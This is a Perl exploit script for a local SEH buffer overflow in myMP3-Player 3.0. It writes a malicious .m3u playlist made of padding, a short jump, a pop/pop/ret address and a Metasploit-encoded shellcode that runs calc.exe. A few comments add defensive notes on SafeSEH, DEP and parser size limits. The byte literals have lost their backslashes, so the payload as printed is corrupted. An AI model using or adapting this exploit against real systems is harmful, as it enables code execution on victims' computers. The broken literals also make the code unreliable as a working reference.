# Title : myMP3-Player v3.0 (.m3u) Local Buffer Overflow Exploit (SEH)
# Published : 2010-03-18
# Author : n3w7u
#!/usr/bin/perl
# Title: myMP3-Player v3.0 (.m3u) Local Buffer Overflow Exploit (SEH)
# Date: 18.03.2010
# Author: n3w7u
# Software Link: http://www.chip.de/downloads/myMP3-Player-3.0_13008621.html
# Version: 3.0 (other versions cannot be downloaded from a reputable page and are not free).
# Tested on: Windows XP SP3 (ger)
#[ Buffer ][ Short Jump ][ P/P/R ][ NOP ][ Shellcode ][ NOP ]
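# Writes a playlist file whose single oversized entry overruns the player's
# stack buffer and overwrites the SEH record, laid out as on the line above:
# [junk][short jump][P/P/R][NOP][payload][NOP].
# Defender notes: SafeSEH/SEHOP and DEP are the standard mitigations for this
# SEH-overwrite technique; a playlist line of ~1 KB of one repeated byte is an
# easy signature for file scanning and a sane size limit in the parser stops
# the overrun at the source.
# NOTE(review): the escape sequences in this copy appear to have lost their
# backslashes in transcription; every literal is kept exactly as found.
my $file = "evil.m3u";
my $junk = "x41" x 1040;     # padding up to the SEH record (author's note: 1056 for the v5/cracked build)
my $jmp  = "xEBx08x90x90";   # "jmp short" per the author
my $seh  = "x25x12xC8x72";   # bytes 72 C8 12 25, a pointer into msacm32.drv per the author
my $nop  = "x90" x 20;
my $nops = "x90" x 10;
# windows/exec - 224 bytes
# http://www.metasploit.com
# Encoder: x86/call4_dword_xor
# EXITFUNC=process, CMD=calc.exe
my $buf =
"x2bxc9x83xe9xcexe8xffxffxffxffxc0x5ex81x76" .
"x0exa8x6ex77xcex83xeexfcxe2xf4x54x86xfexce" .
"xa8x6ex17x47x4dx5fxa5xaax23x3cx47x45xfax62" .
"xfcx9cxbcxe5x05xe6xa7xd9x3dxe8x99x91x46x0e" .
"x04x52x16xb2xaax42x57x0fx67x63x76x09x4ax9e" .
"x25x99x23x3cx67x45xeax52x76x1ex23x2ex0fx4b" .
"x68x1ax3dxcfx78x3exfcx86xb0xe5x2fxeexa9xbd" .
"x94xf2xe1xe5x43x45xa9xb8x46x31x99xaexdbx0f" .
"x67x63x76x09x90x8ex02x3axabx13x8fxf5xd5x4a" .
"x02x2cxf0xe5x2fxeaxa9xbdx11x45xa4x25xfcx96" .
"xb4x6fxa4x45xacxe5x76x1ex21x2ax53xeaxf3x35" .
"x16x97xf2x3fx88x2exf0x31x2dx45xbax85xf1x93" .
"xc2x6fxfax4bx11x6ex77xcexf8x06x46x45xc7xe9" .
"x88x1bx13x9exc2x6cxfex06xd1x5bx15xf3x88x1b" .
"x94x68x0bxc4x28x95x97xbbxadxd5x30xddxdax01" .
"x1dxcexfbx91xa2xadxc9x02x14xe0xcdx16x12xce";
# Fixes versus the original: a lexical handle instead of the undeclared
# global $File, three-arg open (two-arg open lets a filename beginning with
# '>' or '|' change the open mode), and checked open/close so a write
# failure is reported instead of silently producing an empty file.
open(my $fh, '>', $file) or die "open $file: $!";
print {$fh} $junk . $jmp . $seh . $nop . $buf . $nops;
close($fh) or die "close $file: $!";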